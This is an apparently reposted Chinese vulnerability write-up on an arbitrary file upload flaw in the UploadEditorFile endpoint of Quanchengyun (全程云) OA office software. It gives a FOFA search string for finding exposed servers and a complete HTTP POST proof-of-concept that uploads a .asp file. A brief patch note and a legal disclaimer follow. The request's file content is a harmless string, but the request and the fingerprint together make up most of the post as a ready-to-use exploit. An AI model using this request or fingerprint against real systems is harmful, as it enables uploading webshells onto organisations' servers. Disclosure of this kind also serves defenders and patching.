1. 全程云OA 简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
全程云iOA一体化协同办公软件,是全程云出品企业一体化管理软件,为企业内部协同办公管理,提供了高效的软件解决方案。
2.漏洞描述
全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过100多个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程度和综合管理水平,加快企业信息的流通,提高企业市场竞争能力,全程云OA UploadEditorFile接口存在任意文件上传漏洞。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
全程云OA
4.fofa查询语句
body="images/yipeoplehover.png"
5.漏洞复现
漏洞链接:http://xx.xxx.xx.xxx/OA/api/2.0/Common/AttachFile/UploadEditorFile
漏洞数据包:
POST /OA/api/2.0/Common/AttachFile/UploadEditorFile HTTP/1.1
Content-Type: multipart/form-data; boundary=5b8ca40fac2569447025e7ab25beb369
User-Agent:Mozilla/5.0(Macintosh;IntelMac OS X 10_15_7)AppleWebKit/537.36(KHTML, like Gecko)Chrome/108.0.0.0Safari/537.36
Host: xx.xx.xx.xxx
Content-Length:153
Connection: close
--5b8ca40fac2569447025e7ab25beb369
Content-Disposition: form-data; name="upload"; filename="1.asp"
U55NXdQnBfD7
--5b8ca40fac2569447025e7ab25beb369--
会返回上传的文件路径
7.整改意见
打补丁https://oa.24om.com/
原文始发于微信公众号(南风漏洞复现文库):全程云OA UploadEditorFile接口存在任意文件上传漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论